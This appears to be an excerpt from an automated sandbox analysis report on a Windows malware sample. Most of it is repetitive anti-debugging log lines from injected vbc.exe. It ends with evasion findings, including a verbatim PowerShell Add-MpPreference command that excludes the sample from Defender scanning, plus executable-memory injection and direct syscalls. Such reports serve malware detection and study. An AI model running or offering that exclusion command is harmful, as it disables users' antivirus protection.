                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05880710 mov eax, dword ptr fs:[00000030h]6_2_05880710
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B0710 mov eax, dword ptr fs:[00000030h]6_2_058B0710
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BC720 mov eax, dword ptr fs:[00000030h]6_2_058BC720
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BC720 mov eax, dword ptr fs:[00000030h]6_2_058BC720
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B273C mov eax, dword ptr fs:[00000030h]6_2_058B273C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B273C mov ecx, dword ptr fs:[00000030h]6_2_058B273C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B273C mov eax, dword ptr fs:[00000030h]6_2_058B273C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058FC730 mov eax, dword ptr fs:[00000030h]6_2_058FC730
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05904755 mov eax, dword ptr fs:[00000030h]6_2_05904755
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B674D mov esi, dword ptr fs:[00000030h]6_2_058B674D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B674D mov eax, dword ptr fs:[00000030h]6_2_058B674D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B674D mov eax, dword ptr fs:[00000030h]6_2_058B674D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0590E75D mov eax, dword ptr fs:[00000030h]6_2_0590E75D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05880750 mov eax, dword ptr fs:[00000030h]6_2_05880750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2750 mov eax, dword ptr fs:[00000030h]6_2_058C2750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2750 mov eax, dword ptr fs:[00000030h]6_2_058C2750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05888770 mov eax, dword ptr fs:[00000030h]6_2_05888770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890770 mov eax, dword ptr fs:[00000030h]6_2_05890770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890770 mov eax, dword ptr fs:[00000030h]6_2_05890770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890770 mov eax, dword ptr fs:[00000030h]6_2_05890770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890770 mov eax, dword ptr fs:[00000030h]6_2_05890770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890770 mov eax, dword ptr fs:[00000030h]6_2_05890770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890770 mov eax, dword ptr fs:[00000030h]6_2_05890770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890770 mov eax, dword ptr fs:[00000030h]6_2_05890770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890770 mov eax, dword ptr fs:[00000030h]6_2_05890770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890770 mov eax, dword ptr fs:[00000030h]6_2_05890770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890770 mov eax, dword ptr fs:[00000030h]6_2_05890770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890770 mov eax, dword ptr fs:[00000030h]6_2_05890770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890770 mov eax, dword ptr fs:[00000030h]6_2_05890770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05884690 mov eax, dword ptr fs:[00000030h]6_2_05884690
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05884690 mov eax, dword ptr fs:[00000030h]6_2_05884690
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BC6A6 mov eax, dword ptr fs:[00000030h]6_2_058BC6A6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B66B0 mov eax, dword ptr fs:[00000030h]6_2_058B66B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BA6C7 mov ebx, dword ptr fs:[00000030h]6_2_058BA6C7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BA6C7 mov eax, dword ptr fs:[00000030h]6_2_058BA6C7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059006F1 mov eax, dword ptr fs:[00000030h]6_2_059006F1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059006F1 mov eax, dword ptr fs:[00000030h]6_2_059006F1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058FE6F2 mov eax, dword ptr fs:[00000030h]6_2_058FE6F2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058FE6F2 mov eax, dword ptr fs:[00000030h]6_2_058FE6F2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058FE6F2 mov eax, dword ptr fs:[00000030h]6_2_058FE6F2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058FE6F2 mov eax, dword ptr fs:[00000030h]6_2_058FE6F2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589260B mov eax, dword ptr fs:[00000030h]6_2_0589260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589260B mov eax, dword ptr fs:[00000030h]6_2_0589260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589260B mov eax, dword ptr fs:[00000030h]6_2_0589260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589260B mov eax, dword ptr fs:[00000030h]6_2_0589260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589260B mov eax, dword ptr fs:[00000030h]6_2_0589260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589260B mov eax, dword ptr fs:[00000030h]6_2_0589260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589260B mov eax, dword ptr fs:[00000030h]6_2_0589260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058FE609 mov eax, dword ptr fs:[00000030h]6_2_058FE609
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2619 mov eax, dword ptr fs:[00000030h]6_2_058C2619
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0588262C mov eax, dword ptr fs:[00000030h]6_2_0588262C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B6620 mov eax, dword ptr fs:[00000030h]6_2_058B6620
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B8620 mov eax, dword ptr fs:[00000030h]6_2_058B8620
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589E627 mov eax, dword ptr fs:[00000030h]6_2_0589E627
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589C640 mov eax, dword ptr fs:[00000030h]6_2_0589C640
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BA660 mov eax, dword ptr fs:[00000030h]6_2_058BA660
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BA660 mov eax, dword ptr fs:[00000030h]6_2_058BA660
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0594866E mov eax, dword ptr fs:[00000030h]6_2_0594866E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0594866E mov eax, dword ptr fs:[00000030h]6_2_0594866E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B2674 mov eax, dword ptr fs:[00000030h]6_2_058B2674
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C0185 mov eax, dword ptr fs:[00000030h]6_2_058C0185
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0590019F mov eax, dword ptr fs:[00000030h]6_2_0590019F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0590019F mov eax, dword ptr fs:[00000030h]6_2_0590019F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0590019F mov eax, dword ptr fs:[00000030h]6_2_0590019F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0590019F mov eax, dword ptr fs:[00000030h]6_2_0590019F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587A197 mov eax, dword ptr fs:[00000030h]6_2_0587A197
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587A197 mov eax, dword ptr fs:[00000030h]6_2_0587A197
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587A197 mov eax, dword ptr fs:[00000030h]6_2_0587A197
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05924180 mov eax, dword ptr fs:[00000030h]6_2_05924180
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05924180 mov eax, dword ptr fs:[00000030h]6_2_05924180
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0593C188 mov eax, dword ptr fs:[00000030h]6_2_0593C188
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0593C188 mov eax, dword ptr fs:[00000030h]6_2_0593C188
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059461C3 mov eax, dword ptr fs:[00000030h]6_2_059461C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059461C3 mov eax, dword ptr fs:[00000030h]6_2_059461C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058FE1D0 mov eax, dword ptr fs:[00000030h]6_2_058FE1D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058FE1D0 mov eax, dword ptr fs:[00000030h]6_2_058FE1D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058FE1D0 mov ecx, dword ptr fs:[00000030h]6_2_058FE1D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058FE1D0 mov eax, dword ptr fs:[00000030h]6_2_058FE1D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058FE1D0 mov eax, dword ptr fs:[00000030h]6_2_058FE1D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059561E5 mov eax, dword ptr fs:[00000030h]6_2_059561E5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B01F8 mov eax, dword ptr fs:[00000030h]6_2_058B01F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05940115 mov eax, dword ptr fs:[00000030h]6_2_05940115
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592A118 mov ecx, dword ptr fs:[00000030h]6_2_0592A118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592A118 mov eax, dword ptr fs:[00000030h]6_2_0592A118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592A118 mov eax, dword ptr fs:[00000030h]6_2_0592A118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592A118 mov eax, dword ptr fs:[00000030h]6_2_0592A118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592E10E mov eax, dword ptr fs:[00000030h]6_2_0592E10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592E10E mov ecx, dword ptr fs:[00000030h]6_2_0592E10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592E10E mov eax, dword ptr fs:[00000030h]6_2_0592E10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592E10E mov eax, dword ptr fs:[00000030h]6_2_0592E10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592E10E mov ecx, dword ptr fs:[00000030h]6_2_0592E10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592E10E mov eax, dword ptr fs:[00000030h]6_2_0592E10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592E10E mov eax, dword ptr fs:[00000030h]6_2_0592E10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592E10E mov ecx, dword ptr fs:[00000030h]6_2_0592E10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592E10E mov eax, dword ptr fs:[00000030h]6_2_0592E10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592E10E mov ecx, dword ptr fs:[00000030h]6_2_0592E10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B0124 mov eax, dword ptr fs:[00000030h]6_2_058B0124
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05918158 mov eax, dword ptr fs:[00000030h]6_2_05918158
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587C156 mov eax, dword ptr fs:[00000030h]6_2_0587C156
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05914144 mov eax, dword ptr fs:[00000030h]6_2_05914144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05914144 mov eax, dword ptr fs:[00000030h]6_2_05914144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05914144 mov ecx, dword ptr fs:[00000030h]6_2_05914144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05914144 mov eax, dword ptr fs:[00000030h]6_2_05914144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05914144 mov eax, dword ptr fs:[00000030h]6_2_05914144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05886154 mov eax, dword ptr fs:[00000030h]6_2_05886154
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05886154 mov eax, dword ptr fs:[00000030h]6_2_05886154
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0588208A mov eax, dword ptr fs:[00000030h]6_2_0588208A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059460B8 mov eax, dword ptr fs:[00000030h]6_2_059460B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059460B8 mov ecx, dword ptr fs:[00000030h]6_2_059460B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059180A8 mov eax, dword ptr fs:[00000030h]6_2_059180A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059020DE mov eax, dword ptr fs:[00000030h]6_2_059020DE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058880E9 mov eax, dword ptr fs:[00000030h]6_2_058880E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587A0E3 mov ecx, dword ptr fs:[00000030h]6_2_0587A0E3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059060E0 mov eax, dword ptr fs:[00000030h]6_2_059060E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587C0F0 mov eax, dword ptr fs:[00000030h]6_2_0587C0F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C20F0 mov ecx, dword ptr fs:[00000030h]6_2_058C20F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05904000 mov ecx, dword ptr fs:[00000030h]6_2_05904000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05922000 mov eax, dword ptr fs:[00000030h]6_2_05922000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05922000 mov eax, dword ptr fs:[00000030h]6_2_05922000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05922000 mov eax, dword ptr fs:[00000030h]6_2_05922000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05922000 mov eax, dword ptr fs:[00000030h]6_2_05922000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05922000 mov eax, dword ptr fs:[00000030h]6_2_05922000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05922000 mov eax, dword ptr fs:[00000030h]6_2_05922000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05922000 mov eax, dword ptr fs:[00000030h]6_2_05922000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05922000 mov eax, dword ptr fs:[00000030h]6_2_05922000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589E016 mov eax, dword ptr fs:[00000030h]6_2_0589E016
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589E016 mov eax, dword ptr fs:[00000030h]6_2_0589E016
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589E016 mov eax, dword ptr fs:[00000030h]6_2_0589E016
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589E016 mov eax, dword ptr fs:[00000030h]6_2_0589E016
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05916030 mov eax, dword ptr fs:[00000030h]6_2_05916030
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587A020 mov eax, dword ptr fs:[00000030h]6_2_0587A020
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587C020 mov eax, dword ptr fs:[00000030h]6_2_0587C020
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05906050 mov eax, dword ptr fs:[00000030h]6_2_05906050
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05882050 mov eax, dword ptr fs:[00000030h]6_2_05882050
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AC073 mov eax, dword ptr fs:[00000030h]6_2_058AC073
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058A438F mov eax, dword ptr fs:[00000030h]6_2_058A438F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05904F40 mov eax, dword ptr fs:[00000030h]6_2_05904F40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05904F40 mov eax, dword ptr fs:[00000030h]6_2_05904F40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05904F40 mov eax, dword ptr fs:[00000030h]6_2_05904F40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05904F40 mov eax, dword ptr fs:[00000030h]6_2_05904F40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05924F42 mov eax, dword ptr fs:[00000030h]6_2_05924F42
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587CF50 mov eax, dword ptr fs:[00000030h]6_2_0587CF50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587CF50 mov eax, dword ptr fs:[00000030h]6_2_0587CF50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587CF50 mov eax, dword ptr fs:[00000030h]6_2_0587CF50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587CF50 mov eax, dword ptr fs:[00000030h]6_2_0587CF50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587CF50 mov eax, dword ptr fs:[00000030h]6_2_0587CF50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587CF50 mov eax, dword ptr fs:[00000030h]6_2_0587CF50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BCF50 mov eax, dword ptr fs:[00000030h]6_2_058BCF50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AAF69 mov eax, dword ptr fs:[00000030h]6_2_058AAF69
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AAF69 mov eax, dword ptr fs:[00000030h]6_2_058AAF69
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05922F60 mov eax, dword ptr fs:[00000030h]6_2_05922F60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05922F60 mov eax, dword ptr fs:[00000030h]6_2_05922F60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05954F68 mov eax, dword ptr fs:[00000030h]6_2_05954F68
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B2E9C mov eax, dword ptr fs:[00000030h]6_2_058B2E9C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B2E9C mov ecx, dword ptr fs:[00000030h]6_2_058B2E9C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587AE90 mov eax, dword ptr fs:[00000030h]6_2_0587AE90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587AE90 mov eax, dword ptr fs:[00000030h]6_2_0587AE90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587AE90 mov eax, dword ptr fs:[00000030h]6_2_0587AE90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0591AEB0 mov eax, dword ptr fs:[00000030h]6_2_0591AEB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0591AEB0 mov eax, dword ptr fs:[00000030h]6_2_0591AEB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0590CEA0 mov eax, dword ptr fs:[00000030h]6_2_0590CEA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0590CEA0 mov eax, dword ptr fs:[00000030h]6_2_0590CEA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0590CEA0 mov eax, dword ptr fs:[00000030h]6_2_0590CEA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05936ED0 mov ecx, dword ptr fs:[00000030h]6_2_05936ED0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05886EE0 mov eax, dword ptr fs:[00000030h]6_2_05886EE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05886EE0 mov eax, dword ptr fs:[00000030h]6_2_05886EE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05886EE0 mov eax, dword ptr fs:[00000030h]6_2_05886EE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05886EE0 mov eax, dword ptr fs:[00000030h]6_2_05886EE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B8EF5 mov eax, dword ptr fs:[00000030h]6_2_058B8EF5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AAE00 mov eax, dword ptr fs:[00000030h]6_2_058AAE00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AAE00 mov eax, dword ptr fs:[00000030h]6_2_058AAE00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AAE00 mov eax, dword ptr fs:[00000030h]6_2_058AAE00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AAE00 mov ecx, dword ptr fs:[00000030h]6_2_058AAE00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AAE00 mov eax, dword ptr fs:[00000030h]6_2_058AAE00
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe; Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\W3MzrFzSF0.exe"
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe; Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and write
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtAllocateVirtualMemory: Direct from: 0x76EF48EC
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtQueryAttributesFile: Direct from: 0x76EF2E6C
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtQuerySystemInformation: Direct from: 0x76EF48CC
